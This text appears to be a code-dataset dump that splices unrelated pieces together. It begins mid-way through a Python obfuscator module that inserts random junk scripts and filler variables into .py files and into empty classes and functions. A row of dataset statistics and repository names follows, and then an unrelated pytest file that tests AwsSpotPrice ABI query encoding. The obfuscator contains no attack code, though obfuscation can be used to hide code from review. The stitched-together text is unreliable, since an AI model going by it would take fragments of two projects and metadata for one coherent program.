mixerLevelArgDefined=mixerLevelArg
)
varRandom2 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom3 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom4 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom5 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom6 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom7 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom8 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom9 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom10= self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom11= self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom12= self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom13= self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
varRandom14= self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
# ---------- Python random scripts ---------- #
rand = random.randint(1, 7)
# -- script 1 -- #
if rand == 1:
scriptAssPadding1 = textwrap.dedent("""
{0} = '{5}'
{1} = '{6}'
{2} = '{7}'
{3} = '{8}'
{4} = '{9}'
if {0} in {1}:
{0} = {4}
if {1} in {2}:
{1} = {3}
elif {1} in {0}:
{2} = {1}
if {2} in {1}:
{1} = {4}
""").format(varRandom1, varRandom2, varRandom3, varRandom4, varRandom5, \
varRandom6, varRandom7, varRandom8, varRandom9, varRandom10)
return scriptAssPadding1
# -- script 2 -- #
elif rand == 2:
scriptAssPadding2 = textwrap.dedent("""
{0} = '{2}'
{1} = '{3}'
if {0} != {1}:
{0} = '{3}'
{1} = {0}
{0} = '{2}'
""").format(varRandom1, varRandom2, varRandom3, varRandom4)
return scriptAssPadding2
# -- script 3 -- #
elif rand == 3:
scriptAssPadding3 = textwrap.dedent("""
{0} = '{6}'
{1} = '{7}'
{2} = '{8}'
{3} = '{9}'
{4} = '{10}'
{5} = '{11}'
if {0} != {3}:
{1} = {2}
for {5} in {3}:
if {5} != {2}:
{1} = {1}
else:
{4} = {0}
else:
{2} = {0}
{0} = {4}
if {2} == {0}:
for {5} in {0}:
if {5} == {2}:
{2} = {0}
else:
{2} = {4}
""").format(varRandom1, varRandom2, varRandom3, varRandom4, varRandom5, \
varRandom6, varRandom7, varRandom8, varRandom9, varRandom10, \
varRandom11, varRandom12)
return scriptAssPadding3
# -- script 4 -- #
elif rand == 4:
scriptAssPadding4 = textwrap.dedent("""
{0} = '{3}'
{1} = '{4}'
{2} = '{5}'
if {0} == {1}:
{2} = '{5}'
{2} = {0}
else:
{2} = '{5}'
{2} = '{3}'
""").format(varRandom1, varRandom2, varRandom3, varRandom4, \
varRandom5, varRandom6,)
return scriptAssPadding4
# -- script 5 -- #
elif rand == 5:
scriptAssPadding5 = textwrap.dedent("""
{0} = '{6}'
{1} = '{7}'
{2} = '{8}'
{3} = '{9}'
{4} = '{10}'
{5} = '{11}'
if {2} == {3}:
for {5} in {4}:
if {5} == {3}:
{4} = {0}
else:
{3} = {1}
""").format(varRandom1, varRandom2, varRandom3, \
varRandom4, varRandom5, varRandom6, \
varRandom7, varRandom8, varRandom9, \
varRandom10, varRandom11, varRandom12)
return scriptAssPadding5
# -- script 6 -- #
elif rand == 6:
scriptAssPadding6 = textwrap.dedent("""
{0} = '{4}'
{1} = '{5}'
{2} = '{6}'
{3} = '{7}'
if {1} == {0}:
for {0} in {1}:
if {1} == {1}:
{2} = '{3}'
elif {2} == {3}:
{3} = {0}
else:
{0} = {1}
elif {2} == {2}:
for {2} in {1}:
if {3} == {1}:
{2} = '{3}'
elif {2} == {3}:
{3} = {0}
else:
{0} = {1}
for {2} in {1}:
if {3} == {1}:
{2} = '{3}'
elif {2} == {3}:
{3} = {0}
else:
{0} = {3}
else:
{0} = {1}
""").format(varRandom1, varRandom2, varRandom3, \
varRandom4, varRandom5, varRandom6, \
varRandom7, varRandom8)
return scriptAssPadding6
# -- script 7 -- #
elif rand == 7:
scriptAssPadding7 = textwrap.dedent("""
try:
{0} = '{7}'
{1} = '{8}'
{2} = '{9}'
{3} = '{10}'
{4} = '{11}'
{5} = '{12}'
{6} = [
'{7}',
'{9}',
'{11}',
'{13}'
]
for {0} in {5}:
for {1} in {2}:
if {3} == {4}:
{1} = {0}
elif {4} == {1}:
{1} = {5}
else:
{4} = {5}
for {1} in {6}:
{2} = {1}
except Exception:
pass
""").format(varRandom1, varRandom2, varRandom3, \
varRandom4, varRandom5, varRandom6, \
varRandom7, varRandom8, varRandom9, \
varRandom10, varRandom11, varRandom12, \
varRandom13, varRandom14)
return scriptAssPadding7
def AddRandomScripts(self, outputArg, mixerLengthArg, mixerLevelArg, verboseArg):
countScriptsAdded = 0
countLineAdded = 0
countLine = 0
checkLine = 0
checkQuotePassing = 0
checkCharPassing = 0
checkOtherCharPassing = 0
countRecursFiles = 0
addIndentScript = r".*\:{1}\s+$|.*\:{1}\s*$"
quotesIntoVariable = r".*={1}\s*[\"|\']{3}"
quotesEndMultipleLines = r"^\s*[\"|\']{3}\)?\.?"
quotesInRegex = r"={1}\s*r{1}[\"|\']{3}"
noAddScript = r"^\@|\s+\@|\s+return|\s*def\s+.+\s*\:{1}|^class\s+.+\s*\:{1}|.*[\{|\[|\(|\)|\]|\}|,|\\|^]\s*$|\s+yield.*|\s+raise.*"
quoteIntoVariable = r".*\={1}\s*\w*\.?\w*[\(|\.]{1}[\']{3}|.*\={1}\s*\w*\.?\w*[\(|\.]{1}[\"\"\"]{3}|.*\={1}\s*[\"]{3}|.*\={1}\s*[\']{3}"
recursFiles = self.utils.CheckFileDir(
output=outputArg,
detectFiles="py",
blockDir="__pycache__",
blockFile=False,
dirOnly=False
)
for number in recursFiles:
countRecursFiles += 1
print("\n[+] Running add of random scripts in {0} file(s)...\n".format(countRecursFiles))
# -- Count the number of lines that will be checked before filling -- #
with Bar("Setting up ", fill="=", max=countRecursFiles, suffix="%(percent)d%%") as bar:
for file in recursFiles:
with open(file , "r") as readFile:
readF = readFile.readlines()
for eachLine in readF:
if not eachLine:
continue
countLine += 1
bar.next(1)
bar.finish()
# -- Padding scripts added -- #
with Bar("Obfuscation ", fill="=", max=countRecursFiles, suffix="%(percent)d%%") as bar:
for file in recursFiles:
with fileinput.input(file, inplace=True) as inputFile:
for eachLine in inputFile:
sys.stdout.write(eachLine)
if eachLine == "\n":
continue
else:
spaces = len(eachLine) - len(eachLine.lstrip())
# -- Detect code into 3 quotes excepted comments -- #
if re.match(quotesIntoVariable, eachLine):
if re.match(quotesInRegex, eachLine):
pass
else:
checkQuotePassing += 1
continue
elif re.match(quotesEndMultipleLines, eachLine):
if re.match(quotesInRegex, eachLine):
pass
else:
checkQuotePassing += 1
if checkQuotePassing == 2:
checkQuotePassing = 0
continue
if checkQuotePassing == 1:
continue
elif checkQuotePassing == 2:
checkQuotePassing = 0
pass
else:
pass
# -- Check dict, list, tuple in multiple lines -- #
if checkCharPassing == 1:
if re.match(r".*[\"|\'|\)|\]|\}|\w]\s*$", eachLine):
checkCharPassing = 0
continue
else:
continue
elif checkOtherCharPassing >= 1:
if re.match(r".*[\"|\'|\)|\]|\}|\w]\s*$", eachLine):
checkOtherCharPassing -= 1
continue
else:
if re.match(r".*[\(|\{|\[]\s*$", eachLine):
checkOtherCharPassing += 1
continue
else:
pass
if re.match(noAddScript, eachLine):
if re.match(r".*[\\|,]\s*$", eachLine):
if checkCharPassing == 1:
continue
else:
checkCharPassing = 1
continue
elif re.match(r".*[\(|\{|\[]\s*$", eachLine):
checkOtherCharPassing += 1
continue
else:
continue
# -- Adding scripts -- #
elif re.match(addIndentScript, eachLine):
if spaces == 0:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space4)
)
countScriptsAdded += 1
elif spaces == 4:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space8)
)
countScriptsAdded += 1
elif spaces == 8:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space12)
)
countScriptsAdded += 1
elif spaces == 12:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space16)
)
countScriptsAdded += 1
elif spaces == 16:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space20)
)
countScriptsAdded += 1
elif spaces == 20:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space24)
)
countScriptsAdded += 1
elif spaces == 24:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space28)
)
countScriptsAdded += 1
elif spaces == 28:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space32)
)
countScriptsAdded += 1
elif spaces == 32:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space36)
)
countScriptsAdded += 1
elif spaces == 36:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space40)
)
countScriptsAdded += 1
elif spaces == 40:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space44)
)
countScriptsAdded += 1
elif spaces == 44:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space48)
)
countScriptsAdded += 1
elif spaces == 48:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space52)
)
countScriptsAdded += 1
elif spaces == 52:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space56)
)
countScriptsAdded += 1
elif spaces == 56:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space60)
)
countScriptsAdded += 1
elif spaces == 60:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space64)
)
countScriptsAdded += 1
else:
continue
else:
if spaces == 0:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space0)
)
countScriptsAdded += 1
elif spaces == 4:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space4)
)
countScriptsAdded += 1
elif spaces == 8:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space8)
)
countScriptsAdded += 1
elif spaces == 12:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space12)
)
countScriptsAdded += 1
elif spaces == 16:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space16)
)
countScriptsAdded += 1
elif spaces == 20:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space20)
)
countScriptsAdded += 1
elif spaces == 24:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space24)
)
countScriptsAdded += 1
elif spaces == 28:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space28)
)
countScriptsAdded += 1
elif spaces == 32:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space32)
)
countScriptsAdded += 1
elif spaces == 36:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space36)
)
countScriptsAdded += 1
elif spaces == 40:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space40)
)
countScriptsAdded += 1
elif spaces == 44:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space44)
)
countScriptsAdded += 1
elif spaces == 48:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space48)
)
countScriptsAdded += 1
elif spaces == 52:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space52)
)
countScriptsAdded += 1
elif spaces == 56:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space56)
)
countScriptsAdded += 1
elif spaces == 60:
sys.stdout.write(textwrap.indent(Padding.ScriptsGenerator(
self,
mixerLengthArg=mixerLengthArg,
mixerLevelArg=mixerLevelArg),
self.space60)
)
countScriptsAdded += 1
else:
continue
bar.next(1)
bar.finish()
# -- Check if padding has added in output script -- #
with Bar("Check ", fill="=", max=countRecursFiles, suffix="%(percent)d%%") as bar:
for file in recursFiles:
with open(file , "r") as readFile:
readF = readFile.readlines()
for eachLine in readF:
if not eachLine:
continue
checkLine += 1
bar.next(1)
bar.finish()
countLineAdded = checkLine - countLine
if checkLine > countLine:
print("\n-> {0} scripts added in {1} file(s)\n".format(countScriptsAdded, countRecursFiles))
print("-> {0} lines added in {1} file(s)\n".format(countLineAdded, countRecursFiles))
return EXIT_SUCCESS
else:
return EXIT_FAILURE
def EmptyClasses(self, outputArg, mixerLengthArg, mixerLevelArg, verboseArg):
countRecursFiles = 0
counterToCheckIndent = 0
numberLine = 0
numberLineInFile = 0
emptyClassInfo = {}
emptyClassInfoCheck = {}
detectClass = r"^class\s+\w+|\s+class\s+\w+"
classDefined = r"class\s+(\w+)"
recursFiles = self.utils.CheckFileDir(
output=outputArg,
detectFiles="py",
blockDir="__pycache__",
blockFile=False,
dirOnly=False
)
for number in recursFiles:
countRecursFiles += 1
with Bar("Correction ", fill="=", max=countRecursFiles, suffix="%(percent)d%%") as bar:
for file in recursFiles:
numberLineInFile = 0
numberLine = 0
# -- Count all line(s) in file -- #
with open(file, "r") as readFile:
readF = readFile.readlines()
for eachLine in readF:
numberLineInFile += 1
# -- Find and put empty class(es) in dict -- #
with open(file, "r") as readFile:
readF = readFile.readlines()
for eachLine in readF:
numberLine += 1
if counterToCheckIndent == 1:
spacesAfterClass = len(eachLine) - len(eachLine.lstrip())
counterToCheckIndent = 0
if spacesAfterClass == spacesClass:
if search:
emptyClassInfo[search.group(1)] = file
numberLineInFile += 1 # Adding one line because padding will be added
numberLine += 1 # Adding one line because padding will be added
if re.match(detectClass, eachLine):
spacesClass = len(eachLine) - len(eachLine.lstrip())
if numberLine == numberLineInFile:
search = re.search(classDefined, eachLine)
if search:
emptyClassInfo[search.group(1)] = file
else:
counterToCheckIndent += 1
search = re.search(classDefined, eachLine)
# -- Add padding in empty class(es) -- #
numberLine = 0
with fileinput.input(file, inplace=True) as inputFile:
for eachLine in inputFile:
numberLine += 1
if counterToCheckIndent == 1:
spacesAfterClass = len(eachLine) - len(eachLine.lstrip())
counterToCheckIndent = 0
if spacesAfterClass == spacesClass:
paddingVar1 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
paddingVar2 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
finalVarPadding = "{0} = '{1}'\n".format(paddingVar1, paddingVar2)
if spacesClass == 0:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space4))
elif spacesClass == 4:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space8))
elif spacesClass == 8:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space12))
numberLine += 1
sys.stdout.write(eachLine)
if re.match(detectClass, eachLine):
spacesClass = len(eachLine) - len(eachLine.lstrip())
if numberLine == numberLineInFile:
paddingVar1 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
paddingVar2 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
finalVarPadding = "{0} = '{1}'\n".format(paddingVar1, paddingVar2)
if spacesClass == 0:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space4))
elif spacesClass == 4:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space8))
elif spacesClass == 8:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space12))
else:
counterToCheckIndent += 1
bar.next(1)
bar.finish()
# -- Check if class(es) is still empty -- #
if emptyClassInfo != {}:
with Bar("Check ", fill="=", max=countRecursFiles, suffix="%(percent)d%%") as bar:
for file in recursFiles:
numberLineInFile = 0
numberLine = 0
with open(file, "r") as readFile:
readF = readFile.readlines()
for eachLine in readF:
numberLine += 1
if counterToCheckIndent == 1:
spacesAfterClass = len(eachLine) - len(eachLine.lstrip())
counterToCheckIndent = 0
if spacesAfterClass == spacesClass:
if search:
emptyClassInfo[search.group(1)] = file
numberLineInFile += 1
numberLine += 1
if re.match(detectClass, eachLine):
spacesClass = len(eachLine) - len(eachLine.lstrip())
if numberLine == numberLineInFile:
search = re.search(classDefined, eachLine)
if search:
emptyClassInfo[search.group(1)] = file
else:
counterToCheckIndent += 1
search = re.search(classDefined, eachLine)
bar.next(1)
bar.finish()
if emptyClassInfoCheck == {}:
for key, value in emptyClassInfo.items():
print("\n-> File : {0}".format(value))
print("-> Padding added in : {0} ( empty class )".format(key))
return EXIT_SUCCESS
else:
if verboseArg:
print("\n[!] No padding added to empty class(es)... :\n")
for key, value in emptyClassInfoCheck.items():
print("\n-> File : {0}".format(value))
print("-> Class : {0}".format(key))
return EXIT_FAILURE
else:
print("[!] No empty class found in {0}".format(outputArg))
return EXIT_SUCCESS
def EmptyFunctions(self, outputArg, mixerLengthArg, mixerLevelArg, verboseArg):
countRecursFiles = 0
counterToCheckIndent = 0
numberLine = 0
numberLineInFile = 0
emptyFuncInfo = {}
emptyFuncInfoCheck = {}
detectFunction = r"^def\s+\w+|\s+def\s\w+"
functionDefined = r"def\s+(\w+)"
recursFiles = self.utils.CheckFileDir(
output=outputArg,
detectFiles="py",
blockDir="__pycache__",
blockFile=False,
dirOnly=False
)
for number in recursFiles:
countRecursFiles += 1
with Bar("Correction ", fill="=", max=countRecursFiles, suffix="%(percent)d%%") as bar:
for file in recursFiles:
numberLineInFile = 0
numberLine = 0
# -- Count all line(s) in file -- #
with open(file, "r") as readFile:
readF = readFile.readlines()
for eachLine in readF:
numberLineInFile += 1
# -- Find and put empty function(s) in dict -- #
with open(file, "r") as readFile:
readF = readFile.readlines()
for eachLine in readF:
numberLine += 1
if counterToCheckIndent == 1:
spacesAfterFunc = len(eachLine) - len(eachLine.lstrip())
counterToCheckIndent = 0
if spacesAfterFunc == spacesFunc:
if search:
emptyFuncInfo[search.group(1)] = file
numberLineInFile += 1 # Adding one line because padding will be added
numberLine += 1 # Adding one line because padding will be added
if re.match(detectFunction, eachLine):
spacesFunc = len(eachLine) - len(eachLine.lstrip())
if numberLine == numberLineInFile:
search = re.search(functionDefined, eachLine)
if search:
emptyFuncInfo[search.group(1)] = file
else:
counterToCheckIndent += 1
search = re.search(functionDefined, eachLine)
# -- Add padding in empty function(s) -- #
numberLine = 0
with fileinput.input(file, inplace=True) as inputFile:
for eachLine in inputFile:
numberLine += 1
if counterToCheckIndent == 1:
spacesAfterFunc = len(eachLine) - len(eachLine.lstrip())
counterToCheckIndent = 0
if spacesAfterFunc == spacesFunc:
paddingVar1 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
paddingVar2 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
finalVarPadding = "{0} = '{1}'\n".format(paddingVar1, paddingVar2)
if spacesFunc == 0:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space4))
elif spacesFunc == 4:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space8))
elif spacesFunc == 8:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space12))
elif spacesFunc == 12:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space16))
elif spacesFunc == 16:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space20))
elif spacesFunc == 20:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space24))
numberLine += 1
sys.stdout.write(eachLine)
if re.match(detectFunction, eachLine):
spacesFunc = len(eachLine) - len(eachLine.lstrip())
if numberLine == numberLineInFile:
paddingVar1 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
paddingVar2 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
mixerLevelArgDefined=mixerLevelArg
)
finalVarPadding = "{0} = '{1}'\n".format(paddingVar1, paddingVar2)
if spacesFunc == 0:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space4))
elif spacesFunc == 4:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space8))
elif spacesFunc == 8:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space12))
elif spacesFunc == 12:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space16))
elif spacesFunc == 16:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space20))
elif spacesFunc == 20:
sys.stdout.write(textwrap.indent(finalVarPadding, self.space24))
else:
counterToCheckIndent += 1
bar.next(1)
bar.finish()
# -- Check if function(s) is still empty -- #
if emptyFuncInfo != {}:
with Bar("Check ", fill="=", max=countRecursFiles, suffix="%(percent)d%%") as bar:
for file in recursFiles:
numberLineInFile = 0
numberLine = 0
with open(file, "r") as readFile:
readF = readFile.readlines()
for eachLine in readF:
numberLine += 1
if counterToCheckIndent == 1:
spacesAfterFunc = len(eachLine) - len(eachLine.lstrip())
counterToCheckIndent = 0
if spacesAfterFunc == spacesFunc:
if search:
emptyFuncInfoCheck[search.group(1)] = file
numberLineInFile += 1
numberLine += 1
if re.match(detectFunction, eachLine):
spacesFunc = len(eachLine) - len(eachLine.lstrip())
if numberLine == numberLineInFile:
search = re.search(functionDefined, eachLine)
if search:
emptyFuncInfoCheck[search.group(1)] = file
else:
counterToCheckIndent += 1
search = re.search(functionDefined, eachLine)
bar.next(1)
bar.finish()
if emptyFuncInfoCheck == {}:
for key, value in emptyFuncInfo.items():
print("\n-> File : {0}".format(value))
print("-> Padding added in : {0} ( empty function )".format(key))
return EXIT_SUCCESS
else:
if verboseArg:
print("\n[!] No padding added to empty function(s)... :\n")
for key, value in emptyFuncInfoCheck.items():
print("\n-> File : {0}".format(value))
print("-> Function : {0}".format(key))
return EXIT_FAILURE
else:
print("[!] No empty function found in {0}".format(outputArg))
return EXIT_SUCCESS | 64.195762 | 163 | 0.284558 | 2,835 | 63,618 | 6.375309 | 0.088183 | 0.026392 | 0.041053 | 0.060861 | 0.822176 | 0.808786 | 0.803751 | 0.720538 | 0.709472 | 0.700177 | 0 | 0.032742 | 0.651938 | 63,618 | 991 | 164 | 64.195762 | 0.783498 | 0.019884 | 0 | 0.717127 | 0 | 0.00221 | 0.154825 | 0.00443 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005525 | false | 0.026519 | 0.009945 | 0 | 0.033149 | 0.016575 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
29999814e9ee4b3dad7ff168842319add13021a2 | 1,997 | py | Python | tests/test_abi_query.py | t0mcr8se/telliot-core | 5512af5607aafa5c8c73104504ea51565b3c2d05 | [
"MIT"
] | null | null | null | tests/test_abi_query.py | t0mcr8se/telliot-core | 5512af5607aafa5c8c73104504ea51565b3c2d05 | [
"MIT"
] | null | null | null | tests/test_abi_query.py | t0mcr8se/telliot-core | 5512af5607aafa5c8c73104504ea51565b3c2d05 | [
"MIT"
] | null | null | null | from telliot_core.queries.abi_query import AbiQuery
from telliot_core.queries.price.aws_spot_price import AwsSpotPrice
def test_query_data():
q = AwsSpotPrice(zone="us-east-1f", instance="i3.16xlarge")
print(q.query_data.hex())
print(q.abi)
print(q.query_id.hex())
qr = AbiQuery.get_query_from_data(q.query_data)
assert isinstance(qr, AwsSpotPrice)
assert qr.zone == "us-east-1f"
assert qr.instance == "i3.16xlarge"
def test_get_query_from_data():
query_data = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0cAwsSpotPrice\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\nus-east-1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0bi3.16xlarge\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # noqa: E501
q = AbiQuery.get_query_from_data(query_data)
print(q)
assert isinstance(q, AwsSpotPrice)
assert q.zone == "us-east-1f"
assert q.instance == "i3.16xlarge"
